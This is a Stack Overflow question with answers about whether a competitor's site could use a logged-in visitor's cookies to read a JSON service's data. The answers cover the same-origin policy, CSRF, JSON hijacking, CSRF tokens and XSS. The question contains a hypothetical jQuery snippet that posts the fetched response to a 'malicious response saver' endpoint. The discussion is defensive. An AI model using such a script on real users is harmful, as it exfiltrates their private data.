0

We have a JSON web service that is is used by one of our webpages to show "live" data. To get to the page, the user must be logged in. We are concerned about the ability of malicious sites (competitors) to harvest this data. However, I'm not sure if the problem we are anticipating is plausible.

Once a user is logged in, we store a "remember me" cookie on their machine. If someone were to build a site that made an AJAX request to our web service and convinced a logged in user to visit the site, would they be able to retrieve and store the information from our service? If so, how can we protect ourselves against something like that?

For example:

Could a malicious website build a script like this to get our data:

$.post('their.secret.json', function(response) {
     $.post('our.malicious.response.saver', {save: response}, function(ourResponse) {
           alert('we saved your stuff!');
     }
});

Since they are hitting our JSON feed, wouldn't it send the cookie to our site and the user would be authenticated. Since they would be authenticated, wouldn't it send back the sensitive data?

tereško
  • 58,060
  • 25
  • 98
  • 150
TaylorOtwell
  • 7,177
  • 7
  • 32
  • 42

2 Answers2

1

Absent some as-yet-unpatched browser vulnerability, what you appear to be worried about can not be done.

A script on another domain will not be able to make AJAX requests to your domain. Nor can it load up a page from your domain and 'steal' that information.

What you do need to be concerned with as far as CSRF goes would be destructive actions via GET requests, which of course do not require any scripting at all. And all of this of course assumes that your site is not vulnerable to cross-site scripting (which could permit someone to 'steal' data via someone else's login).

I would think you would be much more likely to have problems with 'legitimate' users who are there to 'mine' your data, though. That's more of a business-level thing, though... aside from assuring proper logging to identify such situations.

Andrew Barber
  • 39,603
  • 20
  • 94
  • 123
  • I was able to mock up an example of making a cross-domain AJAX request, and I've seen numerous articles on the web that say it is a vulnerability. Can you elaborate on why it is not possible? – TaylorOtwell Apr 12 '11 at 14:23
  • I was careful with my wording to include "as-yet-unpatched vulnerability". It's not possible otherwise because all browsers honor that separation. If they didn't, anyone could easily create a web page which forced your browser to do what ever they wanted on any web site they wanted. CSRF would basically end the web, period. Instead, CSRF is primarily an issue with sites that don't remember the principle of idempotent GETs – Andrew Barber Apr 12 '11 at 14:27
  • But here is what my overarching point really was: You are selling the information. That means people will get that information. Forget CSRF... you are giving people the information legitimately. What are you doing to make sure your *paid* users are not going to simply resell the info? – Andrew Barber Apr 12 '11 at 14:28
  • ...and I would like to see your example. My guess is you aren't quite getting the full monty there; You don't *need* AJAX to make a simple GET request - they can simply put an IMG tag on their page that does that. That's not what I'm talking about. – Andrew Barber Apr 12 '11 at 14:31
  • Example posted to original question. – TaylorOtwell Apr 12 '11 at 14:35
  • 1
    There are so many questions on this site and elsewhere where people are trying to figure out how to do cross-domain POSTs, such as this one: http://stackoverflow.com/questions/298745/how-do-i-send-a-cross-domain-post-request-via-javascript As I noted; making the request isn't hard at all - you don't need Javascript to make any cross-domain request. But manipulating it is a different story. – Andrew Barber Apr 15 '11 at 07:16
0

If you are afraid that an attacker is able to use the session of a legitimate user to retrieve JSON-objects, you are talking about JSON-hijacking. It depends on the way your JSON-Files are structured, if such an attack is even possible. Look up the term "JSON hijacking" for further information or feel free to leave a comment with more details about your application concerning JSON-objects. If you find out that you are vulnerable, adding a CSRF-Token will help to shut down any JSON hijacking attacks.

You must also make sure that there is not a single Cross-Site Scripting (XSS) vulnerability in your web application. If an attacker can use XSS, it is rather easy for him to harvest data by controlling the browser of a valid user. CSRF-Tokens are useless in such a case.

Demento
  • 4,039
  • 3
  • 26
  • 36
  • Thanks for the tip on JSON-Hijacking. I looked up some articles on the topic, but I'm confused as to why "object wrapping" protects you. Could someone not still construct a jQuery (for example) AJAX request and then post the response back to their own server and write it to disk? – TaylorOtwell Apr 12 '11 at 14:24